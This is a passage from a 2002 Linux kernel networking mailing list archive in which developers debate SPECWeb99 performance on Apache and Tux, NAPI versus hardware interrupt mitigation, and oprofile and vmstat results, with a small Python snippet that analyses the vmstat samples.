In > > particular some controllers are limited to smaller DMA bursts to > > work around hardware bugs. > > I think we're CPU limited (there's no idle time on this machine), > which is odd for an 8 CPU 900MHz P3 Xeon, but still, this is Apache, > not Tux. You mentioned CPU load as another advantage of TSO ... > anything we've done to reduce CPU load enables us to run more and > more connections (I think we started at about 260 or something, so > 2900 ain't too bad ;-)). Troy, is there any chance you could post an oprofile from any sort of reasonably conformant run? I think that might help enlighten people a bit as to what we are fighting with. The last numbers I remember seemed to indicate that we were spending about 1.25 CPUs in network/e1000 code with 100% CPU utilization and crappy SpecWeb throughput. One of our goals is to actually take the next generation of the most common "large system" web server and get it to scale along the lines of Tux or some of the other servers which are more common on the small machines. For some reasons, big corporate customers want lots of features that are in a web server like apache and would also like the performance on their 8-CPU or 16-CPU machine to not suck at the same time. High ideals, I know, wanting all features *and* performance from the same tool... Next thing you know they'll want reliability or some such thing. 
gerrit From haveblue@us.ibm.com Fri Sep 6 10:33:04 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 10:33:06 -0700 (PDT) Received: from e3.ny.us.ibm.com (e3.ny.us.ibm.com [32.97.182.103]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86HX3tG002670 for ; Fri, 6 Sep 2002 10:33:03 -0700 Received: from northrelay01.pok.ibm.com (northrelay01.pok.ibm.com [9.56.224.149]) by e3.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86Hb9lN126310; Fri, 6 Sep 2002 13:37:09 -0400 Received: from nighthawk.sr71.net (dyn9-47-17-248.beaverton.ibm.com [9.47.17.248]) by northrelay01.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86Hb5tW090826; Fri, 6 Sep 2002 13:37:05 -0400 Received: from us.ibm.com (nighthawk [127.0.0.1]) by nighthawk.sr71.net (8.11.6/8.11.6) with ESMTP id g86Hab608607; Fri, 6 Sep 2002 10:36:37 -0700 Message-ID: <3D78E7A5.7050306@us.ibm.com> Date: Fri, 06 Sep 2002 10:36:37 -0700 From: Dave Hansen User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020822 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "Martin J. Bligh" CC: "David S. Miller" , hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, Nivedita Singhvi Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <3D78C9BD.5080905@us.ibm.com> <53430559.1031304588@[10.10.2.3]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 103 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: haveblue@us.ibm.com Precedence: bulk X-list: netdev Martin J. Bligh wrote: >>Something strange happens to the clients when NAPI is enabled on >>the Specweb clients. Somehow the start using a lot more CPU. >>The increased idle time on the server is because the _clients_ are >>CPU maxed. 
I have some preliminary oprofile data for the clients,
>>but it appears that this is another case of Specweb code just
>>really sucking.
>
> Hmmm ... if you change something on the server, and all the clients
> go wild, I'm suspicious of whatever you did to the server.

Me too :) All that was changed was adding the new e1000 driver. NAPI was
disabled.

> You need
> to have a lot more data before leaping to the conclusion that it's
> because the specweb client code is crap.

I'll let the profile speak for itself...

oprofile summary: op_time -d

       1    0.0000  0.0000  /bin/sleep
       2    0.0001  0.0000  /lib/ld-2.2.5.so.dpkg-new (deleted)
       2    0.0001  0.0000  /lib/libpthread-0.9.so
       2    0.0001  0.0000  /usr/bin/expr
       3    0.0001  0.0000  /sbin/init
       4    0.0001  0.0000  /lib/libproc.so.2.0.7
      12    0.0004  0.0000  /lib/libc-2.2.5.so.dpkg-new (deleted)
      17    0.0005  0.0000  /usr/lib/libcrypto.so.0.9.6.dpkg-new (deleted)
      20    0.0006  0.0000  /bin/bash
      30    0.0010  0.0000  /usr/sbin/sshd
     151    0.0048  0.0000  /usr/bin/vmstat
     169    0.0054  0.0000  /lib/ld-2.2.5.so
     300    0.0095  0.0000  /lib/modules/2.4.18+O1/oprofile/oprofile.o
    1115    0.0354  0.0000  /usr/local/bin/oprofiled
    3738    0.1186  0.0000  /lib/libnss_files-2.2.5.so
   58181    1.8458  0.0000  /lib/modules/2.4.18+O1/kernel/drivers/net/acenic.o
  249186    7.9056  0.0000  /home/dave/specweb99/build/client
  582281   18.4733  0.0000  /lib/libc-2.2.5.so
 2256792   71.5986  0.0000  /usr/src/linux/vmlinux

top of oprofile from the client:

08051b3c    2260    0.948938  check_for_timeliness
08051cfc    2716    1.14041   ascii_cat
08050f24    4547    1.90921   HTTPGetReply
0804f138    4682    1.9659    workload_op
08050890    6111    2.56591   HTTPDoConnect
08049a30    7330    3.07775   SHMmalloc
08052244    7433    3.121     HTParse
08052628    8482    3.56146   HTSACopy
08051d88   10288    4.31977   get_some_line
08052150   13070    5.48788   scan
08051a10   65314   27.4243    assign_port_number
0804bd30   83789   35.1817    LOG

#define LOG(x) do {} while(0)

Voila! 35% more CPU!

Top of Kernel profile:

c022c850   33085    1.46602   number
c0106e59   42693    1.89176   restore_all
c01dfe68   42787    1.89592   sys_socketcall
c01df39c   54185    2.40097   sys_bind
c01de698   62740    2.78005   sockfd_lookup
c01372c8   97886    4.3374    fput
c022c110  125306    5.55239   __generic_copy_to_user
c01373b0  181922    8.06109   fget
c020958c  199054    8.82022   tcp_v4_get_port
c0106e10  199934    8.85921   system_call
c022c158  214014    9.48311   __generic_copy_from_user
c0216ecc  257768   11.4219    inet_bind

"oprofpp -k -dl -i /lib/libc-2.2.5.so" just gives:

vma       samples  %-age  symbol name  linenr info                image name
00000000  582281   100    (no symbol)  (no location information)  /lib/libc-2.2.5.so

I've never really tried to profile anything but the kernel before. Any ideas?

> Troy - I think your UP clients weren't anywhere near maxed out on
> CPU power, right? Can you take a peek at the clients under NAPI load?

Make sure you wait a minute or two. The client tends to ramp up.

"vmstat 2" after the client has told the master that it is running:

 U  S  I
----------
 4 15 81
 5 17 79
 7 16 77
 7 17 76
 7 21 72
11 25 64
 3 16 82
 2 14 84
 7 23 70
16 50 34
24 75  0
27 73  0
28 72  0
24 76  0
...

> Dave - did you ever try running 4 specweb clients bound to each of
> the 4 CPUs in an attempt to make the clients scale better? I'm
> suspicious that you're maxing out 4 4-way machines, and Troy's
> 16 UPs are cruising along just fine.

No, but I'm not sure it will do any good. They don't run often enough and I
have the feeling that there are very few cache locality benefits to be had.
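
The ramp-up visible in the "vmstat 2" samples above can be checked mechanically. The sketch below is only an illustration: the (user, system, idle) triples are copied from the quoted output, the 2-second spacing comes from the "vmstat 2" invocation, and the function names are made up for this example.

```python
# (user, system, idle) percentages, one tuple per "vmstat 2" sample above.
SAMPLES = [
    (4, 15, 81), (5, 17, 79), (7, 16, 77), (7, 17, 76), (7, 21, 72),
    (11, 25, 64), (3, 16, 82), (2, 14, 84), (7, 23, 70), (16, 50, 34),
    (24, 75, 0), (27, 73, 0), (28, 72, 0), (24, 76, 0),
]
INTERVAL_S = 2  # sampling interval given to vmstat


def first_saturated(samples, idle_threshold=0):
    """Return the index of the first sample with idle% <= threshold, or None."""
    for i, (_user, _system, idle) in enumerate(samples):
        if idle <= idle_threshold:
            return i
    return None


def system_share(samples):
    """Fraction of the busy CPU time that was spent in system (kernel) mode."""
    user = sum(u for u, _s, _i in samples)
    system = sum(s for _u, s, _i in samples)
    return system / (user + system)


if __name__ == "__main__":
    idx = first_saturated(SAMPLES)
    if idx is None:
        print("client never ran out of idle CPU in these samples")
    else:
        print("idle reaches zero at sample", idx,
              "about", idx * INTERVAL_S, "s after the first sample")
        print("system share once saturated: %.2f" % system_share(SAMPLES[idx:]))
```

On these samples roughly three quarters of the saturated client's CPU time is system time, which fits the picture of the kernel image dominating the oprofile summary.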
-- Dave Hansen haveblue@us.ibm.com From davem@redhat.com Fri Sep 6 10:40:24 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 10:40:26 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86HeOtG003085 for ; Fri, 6 Sep 2002 10:40:24 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id KAA14378; Fri, 6 Sep 2002 10:37:17 -0700 Date: Fri, 06 Sep 2002 10:37:17 -0700 (PDT) Message-Id: <20020906.103717.82432404.davem@redhat.com> To: gh@us.ibm.com Cc: Martin.Bligh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: References: <18563262.1031269721@[10.10.2.3]> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 104 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Gerrit Huizenga Date: Fri, 06 Sep 2002 10:26:04 -0700 One of our goals is to actually take the next generation of the most common "large system" web server and get it to scale along the lines of Tux or some of the other servers which are more common on the small machines. For some reasons, big corporate customers want lots of features that are in a web server like apache and would also like the performance on their 8-CPU or 16-CPU machine to not suck at the same time. High ideals, I know, wanting all features *and* performance from the same tool... Next thing you know they'll want reliability or some such thing. Why does Tux keep you from taking advantage of all the feature of Apache? 
Anything Tux doesn't handle in it's fast path is simple fed up to Apache. From gerrit@us.ibm.com Fri Sep 6 11:15:49 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 11:15:51 -0700 (PDT) Received: from e21.nc.us.ibm.com (e21.nc.us.ibm.com [32.97.136.227]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86IFmtG005877 for ; Fri, 6 Sep 2002 11:15:48 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e21.nc.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86IJxDf020252; Fri, 6 Sep 2002 14:20:00 -0400 Received: from w-gerrit2 (dyn9-47-17-91.beaverton.ibm.com [9.47.17.91]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86IJrWq077514; Fri, 6 Sep 2002 12:19:53 -0600 Received: from w-gerrit2 ([127.0.0.1] helo=us.ibm.com ident=gerrit) by w-gerrit2 with esmtp (Exim 3.35 #1 (Debian)) id 17nNhM-0003PD-00; Fri, 06 Sep 2002 11:19:16 -0700 To: "David S. Miller" cc: Martin.Bligh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Reply-To: Gerrit Huizenga From: Gerrit Huizenga Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-reply-to: Your message of Fri, 06 Sep 2002 10:37:17 PDT. <20020906.103717.82432404.davem@redhat.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <13091.1031336351.1@us.ibm.com> Date: Fri, 06 Sep 2002 11:19:11 -0700 Message-Id: X-archive-position: 105 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gh@us.ibm.com Precedence: bulk X-list: netdev In message <20020906.103717.82432404.davem@redhat.com>, > : "David S. 
Miller" writes: > From: Gerrit Huizenga > Date: Fri, 06 Sep 2002 10:26:04 -0700 > > One of our goals is to actually take the next generation of the most > common "large system" web server and get it to scale along the lines > of Tux or some of the other servers which are more common on the > small machines. For some reasons, big corporate customers want lots > of features that are in a web server like apache and would also like > the performance on their 8-CPU or 16-CPU machine to not suck at the > same time. High ideals, I know, wanting all features *and* performance > from the same tool... Next thing you know they'll want reliability > or some such thing. > > Why does Tux keep you from taking advantage of all the > feature of Apache? Anything Tux doesn't handle in it's > fast path is simple fed up to Apache. You have to ask the hard questions... Some of this is rooted in the past when Tux was emerging as a technology rather than ubiquitously available. And, combined with the fact that most customers tend to lag the technology curve, Apache 1.X or, in our case, IBM HTTPD was simply a customer drop-in with standard configuration support that roughly matched that on all other platforms, e.g. AIX, Solaris, HPUX, Linux, etc. So, doing a one-off for Linux at a very heterogeneous large customer adds pain, and that pain becomes cost for the customer in terms of consulting, training, sys admin, system management, etc. We also had some bad starts with using Tux in terms of performance and scalability on 4-CPU and 8-CPU machines, especially when combining with things like squid or other cacheing products from various third parties. Then there is the problem that 90%+ of our customers seem to have dynamic-only web servers. Static content is limited to a couple of banners and images that need to be tied into some kind of cacheing content server. So, Tux's benefits for static serving turned out to be only additional overhead because there were no static pages to be served up.
And, honestly, I'm a kernel guy much more than an applications guy, so I'll admit that I'm not up to speed on what Tux2 can do with dynamic content. The last I knew was that it could pass it off to another server. So we are focused on making the most common case for our customer situations scale well. As you are probably aware, there are no specweb results posted using Apache, but web crawler stats suggest that Apache is the most common server. The problem is that performance on Apache sucks but people like the features. Hence we are working to make Apache suck less, and finding that part of the problem is the way it uses the kernel. Other parts are the interface for specweb in particular which we have done a bunch of work on with Greg Ames. And we are feeding data back to the Apache 2.0 team which should help Apache in general. gerrit From Martin.Bligh@us.ibm.com Fri Sep 6 11:24:07 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 11:24:11 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86IO6tG006290 for ; Fri, 6 Sep 2002 11:24:06 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e35.co.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86ISDf4029820; Fri, 6 Sep 2002 14:28:13 -0400 Received: from [10.10.2.3] (sig-9-65-197-17.mts.ibm.com [9.65.197.17]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86IS7Wq041154; Fri, 6 Sep 2002 12:28:08 -0600 Date: Fri, 06 Sep 2002 11:26:49 -0700 From: "Martin J. Bligh" Reply-To: "Martin J. Bligh" To: Gerrit Huizenga , "David S. 
Miller" cc: hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Message-ID: <60449712.1031311608@[10.10.2.3]> In-Reply-To: References: X-Mailer: Mulberry/2.1.2 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline X-archive-position: 106 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Martin.Bligh@us.ibm.com Precedence: bulk X-list: netdev >> One of our goals is to actually take the next generation of the most >> common "large system" web server and get it to scale along the lines >> of Tux or some of the other servers which are more common on the >> small machines. For some reasons, big corporate customers want lots >> of features that are in a web server like apache and would also like >> the performance on their 8-CPU or 16-CPU machine to not suck at the >> same time. High ideals, I know, wanting all features *and* performance >> from the same tool... Next thing you know they'll want reliability >> or some such thing. >> >> Why does Tux keep you from taking advantage of all the >> feature of Apache? Anything Tux doesn't handle in it's >> fast path is simple fed up to Apache. > > You have to ask the hard questions... Ultimately, to me at least, the server doesn't really matter, and neither do the absolute benchmark numbers. Linux should scale under any reasonable workload. The point of this is to look at the Linux kernel, not the webserver, or specweb ... they're just hammers to beat on the kernel with. The fact that we're doing something different from everyone else and turning up a different set of kernel issues is a good thing, to my mind. You're right, we could use Tux if we wanted to ... but that doesn't stop Apache being interesting ;-) M. 
From manfred@colorfullife.com Fri Sep 6 11:30:53 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 11:30:54 -0700 (PDT) Received: from dbl.q-ag.de (IDENT:root@dbl.q-ag.de [80.146.160.66]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86IUptG007100 for ; Fri, 6 Sep 2002 11:30:52 -0700 Received: from colorfullife.com (IDENT:root@localhost.localdomain [127.0.0.1]) by dbl.q-ag.de (8.11.6/8.11.6) with ESMTP id g86IYil04483; Fri, 6 Sep 2002 20:34:49 +0200 Message-ID: <3D78F55C.4020207@colorfullife.com> Date: Fri, 06 Sep 2002 20:35:08 +0200 From: Manfred Spraul User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0) X-Accept-Language: en, de MIME-Version: 1.0 To: Dave Hansen , jamal , netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 108 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: manfred@colorfullife.com Precedence: bulk X-list: netdev > > The real question is why NAPI causes so much more work for the client. > [Just a summary from my results from last year. All testing with a simple NIC without hw interrupt mitigation, on a Cyrix P150] My assumption was that NAPI increases the cost of receiving a single packet: instead of one hw interrupt with one device access (ack interrupt) and the softirq processing, the hw interrupt must ack & disable the interrupt, then the processing occurs in softirq context, and the interrupts are reenabled at softirq context. The second point was that interrupt mitigation must remain enabled, even with NAPI: the automatic mitigation doesn't work with process space limited loads (e.g. 
TCP: backlog queue is drained quickly, but the system is busy processing the prequeue or receive queue) jamal, is it possible for a driver to use both NAPI and the normal interface, or would that break fairness? Use netif_rx() until it reports that it is dropping packets. If that happens, disable the interrupt and call netif_rx_schedule(). Is it possible to determine the average number of packets that are processed for each netif_rx_schedule()? -- Manfred From haveblue@us.ibm.com Fri Sep 6 11:29:40 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 11:29:46 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86ITetG006868 for ; Fri, 6 Sep 2002 11:29:40 -0700 Received: from westrelay03.boulder.ibm.com (westrelay03.boulder.ibm.com [9.17.194.24]) by e35.co.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86IXkf4021744; Fri, 6 Sep 2002 14:33:46 -0400 Received: from nighthawk.sr71.net (dyn9-47-17-248.beaverton.ibm.com [9.47.17.248]) by westrelay03.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86IXi19096568; Fri, 6 Sep 2002 12:33:44 -0600 Received: from us.ibm.com (nighthawk [127.0.0.1]) by nighthawk.sr71.net (8.11.6/8.11.6) with ESMTP id g86IXA608854; Fri, 6 Sep 2002 11:33:10 -0700 Message-ID: <3D78F4E6.3020101@us.ibm.com> Date: Fri, 06 Sep 2002 11:33:10 -0700 From: Dave Hansen User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020822 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Andi Kleen CC: "Martin J. Bligh" , "David S.
Miller" , hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, Nivedita Singhvi Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <3D78C9BD.5080905@us.ibm.com> <53430559.1031304588@[10.10.2.3]> <3D78E7A5.7050306@us.ibm.com> <20020906202646.A2185@wotan.suse.de> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 107 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: haveblue@us.ibm.com Precedence: bulk X-list: netdev

Andi Kleen wrote:
>>c0106e59 42693 1.89176 restore_all
>>c01dfe68 42787 1.89592 sys_socketcall
>>c01df39c 54185 2.40097 sys_bind
>>c01de698 62740 2.78005 sockfd_lookup
>>c01372c8 97886 4.3374 fput
>>c022c110 125306 5.55239 __generic_copy_to_user
>>c01373b0 181922 8.06109 fget
>>c020958c 199054 8.82022 tcp_v4_get_port
>>c0106e10 199934 8.85921 system_call
>>c022c158 214014 9.48311 __generic_copy_from_user
>>c0216ecc 257768 11.4219 inet_bind
>
> The profile looks bogus. The NIC driver is nowhere in sight. Normally
> its mmap IO for interrupts and device registers should show. I would
> double check it (e.g. with normal profile)

Actually, oprofile separated out the acenic module from the rest of the kernel. I should have included that breakout as well.
but it was only 1.3 of CPU: 1.3801 0.0000 /lib/modules/2.4.18+O1/kernel/drivers/net/acenic.o -- Dave Hansen haveblue@us.ibm.com From davem@redhat.com Fri Sep 6 11:37:53 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 11:37:59 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86IbrtG007665 for ; Fri, 6 Sep 2002 11:37:53 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id LAA14780; Fri, 6 Sep 2002 11:34:49 -0700 Date: Fri, 06 Sep 2002 11:34:48 -0700 (PDT) Message-Id: <20020906.113448.07697441.davem@redhat.com> To: gh@us.ibm.com Cc: Martin.Bligh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: References: <20020906.103717.82432404.davem@redhat.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 109 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Gerrit Huizenga Date: Fri, 06 Sep 2002 11:19:11 -0700 And, honestly, I'm a kernel guy much more than an applications guy, so I'll admit that I'm not up to speed on what Tux2 can do with dynamic content. TUX can optimize dynamic content just fine. The last I knew was that it could pass it off to another server. Not true. The problem is that performance on Apache sucks but people like the features. Tux's design allows it to be a drop in acceleration method which does not require you to relinquish Apache's feature set. 
From davem@redhat.com Fri Sep 6 11:39:18 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 11:39:20 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86IdItG008025 for ; Fri, 6 Sep 2002 11:39:18 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id LAA14801; Fri, 6 Sep 2002 11:36:11 -0700 Date: Fri, 06 Sep 2002 11:36:11 -0700 (PDT) Message-Id: <20020906.113611.102227888.davem@redhat.com> To: Martin.Bligh@us.ibm.com Cc: gh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: <60449712.1031311608@[10.10.2.3]> References: <60449712.1031311608@[10.10.2.3]> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 110 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: "Martin J. Bligh" Date: Fri, 06 Sep 2002 11:26:49 -0700 The fact that we're doing something different from everyone else and turning up a different set of kernel issues is a good thing, to my mind. You're right, we could use Tux if we wanted to ... but that doesn't stop Apache being interesting ;-) Tux does not obviate Apache from the equation. See my other emails. 
From davem@redhat.com Fri Sep 6 11:40:00 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 11:40:02 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86Ie0tG008381 for ; Fri, 6 Sep 2002 11:40:00 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id LAA14818; Fri, 6 Sep 2002 11:36:53 -0700 Date: Fri, 06 Sep 2002 11:36:52 -0700 (PDT) Message-Id: <20020906.113652.40767574.davem@redhat.com> To: haveblue@us.ibm.com Cc: ak@suse.de, Martin.Bligh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: <3D78F4E6.3020101@us.ibm.com> References: <3D78E7A5.7050306@us.ibm.com> <20020906202646.A2185@wotan.suse.de> <3D78F4E6.3020101@us.ibm.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 111 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Dave Hansen Date: Fri, 06 Sep 2002 11:33:10 -0700 Actually, oprofile separated out the acenic module from the rest of the kernel. I should have included that breakout as well. but it was only 1.3 of CPU: 1.3801 0.0000 /lib/modules/2.4.18+O1/kernel/drivers/net/acenic.o We thought you were using e1000 in these tests? 
From davem@redhat.com Fri Sep 6 11:41:44 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 11:41:45 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86IfhtG008745 for ; Fri, 6 Sep 2002 11:41:43 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id LAA14829; Fri, 6 Sep 2002 11:38:29 -0700 Date: Fri, 06 Sep 2002 11:38:29 -0700 (PDT) Message-Id: <20020906.113829.65591342.davem@redhat.com> To: manfred@colorfullife.com Cc: haveblue@us.ibm.com, hadi@cyberus.ca, netdev@oss.sgi.com, linux-kernel@vger.kernel.org Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: <3D78F55C.4020207@colorfullife.com> References: <3D78F55C.4020207@colorfullife.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 112 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Manfred Spraul Date: Fri, 06 Sep 2002 20:35:08 +0200 The second point was that interrupt mitigation must remain enabled, even with NAPI: the automatic mitigation doesn't work with process space limited loads (e.g. TCP: backlog queue is drained quickly, but the system is busy processing the prequeue or receive queue) Not true. NAPI is in fact a %100 replacement for hw interrupt mitigation strategies. The cpu usage elimination afforded by hw interrupt mitigation is also afforded by NAPI and even more so by NAPI. See Jamal's paper. Franks a lot, David S. 
Miller davem@redhat.com From Martin.Bligh@us.ibm.com Fri Sep 6 11:42:30 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 11:42:31 -0700 (PDT) Received: from e21.nc.us.ibm.com (e21.nc.us.ibm.com [32.97.136.227]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g86IgTtG009097 for ; Fri, 6 Sep 2002 11:42:30 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e21.nc.us.ibm.com (8.12.2/8.12.2) with ESMTP id g86IkfDf108126; Fri, 6 Sep 2002 14:46:41 -0400 Received: from [10.10.2.3] (sig-9-65-197-17.mts.ibm.com [9.65.197.17]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g86IkZWq095160; Fri, 6 Sep 2002 12:46:36 -0600 Date: Fri, 06 Sep 2002 11:45:17 -0700 From: "Martin J. Bligh" Reply-To: "Martin J. Bligh" To: "David S. Miller" , haveblue@us.ibm.com cc: ak@suse.de, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Message-ID: <61557945.1031312716@[10.10.2.3]> In-Reply-To: <20020906.113652.40767574.davem@redhat.com> References: <20020906.113652.40767574.davem@redhat.com> X-Mailer: Mulberry/2.1.2 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline X-archive-position: 113 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: 